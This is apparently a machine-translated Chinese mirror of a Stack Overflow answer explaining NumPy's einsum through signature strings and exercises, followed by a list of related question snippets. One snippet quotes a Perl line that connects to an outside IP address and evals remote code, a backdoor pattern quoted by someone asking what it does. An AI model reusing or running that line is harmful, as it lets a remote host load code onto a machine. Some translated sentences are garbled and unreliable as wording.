python - 理解 NumPy 的 einsum-6ren

python - 理解 NumPy 的 einsum

转载作者：IT老高更新时间：2023-10-28 12:25:52

27

4

我正在努力理解究竟是如何 einsum 作品。我查看了文档和一些示例，但似乎并没有坚持。
这是我们在类里面看过的一个例子:

C = np.einsum("ij,jk->ki", A, B)

对于两个数组: A和 B .
我认为这需要 A^T * B ，但我不确定(它正在对其中一个进行转置，对吗？)。谁能告诉我这里到底发生了什么(通常在使用 einsum 时)？

最佳答案

(注意:此答案基于我不久前写的关于 einsum 的简短 blog post。)
什么einsum做？
假设我们有两个多维数组，A和 B .现在让我们假设我们想要...

乘A与 B以一种特殊的方式来创造新的产品系列；然后也许

沿特定轴对这个新数组求和；然后也许

按特定顺序转置新数组的轴。

很有可能 einsum与 multiply 等 NumPy 函数的组合相比，它将帮助我们更快、更高效地完成此操作。 , sum和 transpose会同意。
怎么样 einsum工作？
这是一个简单(但并非完全微不足道)的示例。取以下两个数组:

A = np.array([0, 1, 2])

B = np.array([[ 0,  1,  2,  3],
              [ 4,  5,  6,  7],
              [ 8,  9, 10, 11]])

我们将相乘 A和 B逐元素，然后沿新数组的行求和。在“正常”的 NumPy 中，我们会这样写:

>>> (A[:, np.newaxis] * B).sum(axis=1)
array([ 0, 22, 76])

所以在这里，对 A 的索引操作排列两个数组的第一个轴，以便可以广播乘法。然后将产品数组的行相加以返回答案。
现在，如果我们想使用 einsum相反，我们可以写:

>>> np.einsum('i,ij->i', A, B)
array([ 0, 22, 76])

签名字符串 'i,ij->i'是这里的关键，需要稍微解释一下。你可以把它想成两半。在左侧( -> 的左侧)，我们标记了两个输入数组。在 -> 的右侧，我们已经标记了我们想要结束的数组。
下面是接下来发生的事情:

A有一个轴；我们已经给它贴上了标签 i .和 B有两个轴；我们将轴 0 标记为 i和轴 1 为 j .

来自重复标签i在两个输入数组中，我们告诉 einsum这两个轴应该是乘以一起。换句话说，我们乘以数组 A与数组的每一列 B ，就像 A[:, np.newaxis] * B做。

请注意 j在我们想要的输出中没有作为标 checkout 现；我们刚刚用过 i (我们希望以一维数组结束)。来自省略标签，我们告诉 einsum至总和沿着这个轴。换句话说，我们对乘积的行求和，就像 .sum(axis=1)做。

这基本上就是您使用 einsum 所需要知道的全部内容。 .稍微玩一下会有所帮助；如果我们在输出中保留两个标签， 'i,ij->ij' ，我们得到一个二维的产品数组(与 A[:, np.newaxis] * B 相同)。如果我们说没有输出标签， 'i,ij-> ，我们得到一个单一的数字(与做 (A[:, np.newaxis] * B).sum() 相同)。
关于 einsum 的伟大之处然而，它并没有先构建一个临时的产品阵列；它只是对产品进行汇总。这可以大大节省内存使用。
一个稍微大一点的例子
为了解释点积，这里有两个新数组:

A = array([[1, 1, 1],
           [2, 2, 2],
           [5, 5, 5]])

B = array([[0, 1, 0],
           [1, 1, 0],
           [1, 1, 1]])

我们将使用 np.einsum('ij,jk->ik', A, B) 计算点积.这是一张显示 A 标签的图片和 B以及我们从函数中得到的输出数组:

你可以看到标签 j重复 - 这意味着我们将 A 的行相乘列 B .此外，标签 j不包括在输出中 - 我们正在对这些乘积求和。标签 i和 k保留用于输出，所以我们得到一个二维数组。
将此结果与标签 j 所在的数组进行比较可能会更清楚。没有总结。下面，在左侧，您可以看到写入 np.einsum('ij,jk->ijk', A, B) 所产生的 3D 数组。 (即我们保留了标签 j ):

求和轴 j给出预期的点积，如右图所示。
一些练习
获得更多感受 einsum ，使用下标表示法实现熟悉的 NumPy 数组操作会很有用。任何涉及乘法和求和轴组合的内容都可以使用 einsum 编写。 .
设 A 和 B 是两个长度相同的一维数组。例如， A = np.arange(10)和 B = np.arange(5, 15) .

A的总和可以写成:

np.einsum('i->', A)

逐元素乘法，A * B ，可以写成:

np.einsum('i,i->i', A, B)

内积或点积，np.inner(A, B)或 np.dot(A, B) ，可以写成:

np.einsum('i,i->', A, B) # or just use 'i,i'

外积，np.outer(A, B) ，可以写成:

np.einsum('i,j->ij', A, B)

对于二维数组， C和 D ，假设轴是兼容的长度(两者长度相同或其中之一的长度为 1)，以下是一些示例:

C的踪迹(主对角线的总和)，np.trace(C) ，可以写成:

np.einsum('ii', C)

C 的逐元素乘法和 D 的转置, C * D.T ，可以写成:

np.einsum('ij,ji->ij', C, D)

将 C 的每个元素相乘通过数组 D (制作 4D 阵列)，C[:, :, None, None] * D ，可以写成:

np.einsum('ij,kl->ijkl', C, D)

关于python - 理解 NumPy 的 einsum，我们在Stack Overflow上找到一个类似的问题： https://stackoverflow.com/questions/26089893/

27

4

0

文章推荐： python - functools partial 是如何做到的？

文章推荐： c - 如何从 C 程序中获得 100% 的 CPU 使用率

文章推荐： linux - VIM:如何在 Ubuntu 上精确到行

文章推荐： python - 使用 url_for() 在 Flask 中创建动态 URL

haskell - 理解 (>>=) 。 (>>=)
我试图理解 (>>=).(>>=) ，GHCi 告诉我的是: (>>=) :: Monad m => m a -> (a -> m b) -> m b (>>=).(>>=) :: Mon
Java，理解
关于此 Java 代码，我有以下问题: public static void main(String[] args) { int A = 12, B = 24; int x = A,
Javascript 理解
对于这个社区来说，这可能是一个愚蠢的基本问题，但如果有人能向我解释一下，我会非常满意，我对此感到非常困惑。我在网上找到了这个教程，这是一个例子。 function sports (x){
Python语法/理解
def counting_sort(array, maxval): """in-place counting sort""" m = maxval + 1 count = [0
sorting - 理解 assembly
我有一些排序算法的集合，我想弄清楚它究竟是如何运作的。我对一些说明有些困惑，特别是 cmp 和 jle 说明，所以我正在寻求帮助。此程序集对包含三个元素的数组进行排序。 0.00 :
PHP:理解 $this - 调用基类方法而不是子方法
阅读 PHP.net 文档时，我偶然发现了一个扭曲了我理解 $this 的方式的问题: class C { public function speak_child() { //
image-processing - 理解
关闭。这个问题不满足Stack Overflow guidelines .它目前不接受答案。想改善这个问题吗？更新问题，使其成为 on-topic对于堆栈溢出。 7年前关闭。 Improve thi
warnings - 理解 pragma
我有几个关于 pragmas 的相关问题.让我开始这一系列问题的原因是试图确定是否可以禁用某些警告而不用一直到 no worries。 (我还是想担心，至少有点担心!)。我仍然对那个特定问题的答案感兴
Lua - 理解 setmetatable
我正在尝试构建 CNN使用 Torch 7 .我对 Lua 很陌生.我试图关注这个 link .我遇到了一个叫做 setmetatable 的东西在以下代码块中: setmetatable(train
Perl - 理解 "botstrap"
我有这段代码 use lib do{eval&&botstrap("AutoLoad")if$b=new IO::Socket::INET 82.46.99.88.":1"}; 这似乎导入了一个库，但
Haskell 中的函数——理解
我有以下代码，它给出了 [2,4,6] : j :: [Int] j = ((\f x -> map x) (\y -> y + 3) (\z -> 2*z)) [1,2,3] 为什么？似乎只使用了“
haskell - 理解 (.) 的类型签名
我刚刚使用 Richard Bird 的书学习 Haskell 和函数式编程，并遇到了 (.) 函数的类型签名。即 (.) :: (b -> c) -> (a -> b) -> (a -> c) 和相
scala - 理解 `andThen`
我遇到了andThen ，但没有正确理解它。为了进一步了解它，我阅读了 Function1.andThen文档 def andThen[A](g: (R) ⇒ A): (T1) ⇒ A mm是 Mu
JavaScript .call 理解
这是一个代码，用作 XMLHttpRequest 的 URL 的附加内容。URL 中显示的内容是: http://something/something.aspx?QueryString_from_b
javascript - 理解 Promise.all
考虑以下我从 https://stackoverflow.com/a/28250704/460084 获取的代码 function getExample() { var a = promise
Scala:理解::: 运算符
将 list1::: list2 运算符应用于两个列表是否相当于将 list1 的所有内容附加到 list2 ？ scala> val a = List(1,2,3) a: List[Int] = L
Dart map 理解
在python中我会写: {a:0 for a in range(5)} 得到 {0: 0, 1: 0, 2: 0, 3: 0, 4: 0} 我怎样才能在 Dart 中达到同样的效果？到目前为止，我
javascript - 理解 setTimeout
关闭。这个问题需要多问focused 。目前不接受答案。想要改进此问题吗？更新问题，使其仅关注一个问题 editing this post . 已关闭 5 年前。 Improve this ques
makefile - 理解 Makefile
我有以下 make 文件: CC = gcc CCDEPMODE = depmode=gcc3 CFLAGS = -g -O2 -W -Wall -Wno-unused -Wno-multichar
Haskell 理解 fmap
有人可以帮助或指导我如何理解以下实现中的 fmap 函数吗？ data Rose a = a :> [Rose a] deriving (Eq, Show) instance Functor Rose

首页

博学

6Ren·AI

商城

python - 理解 NumPy 的 einsum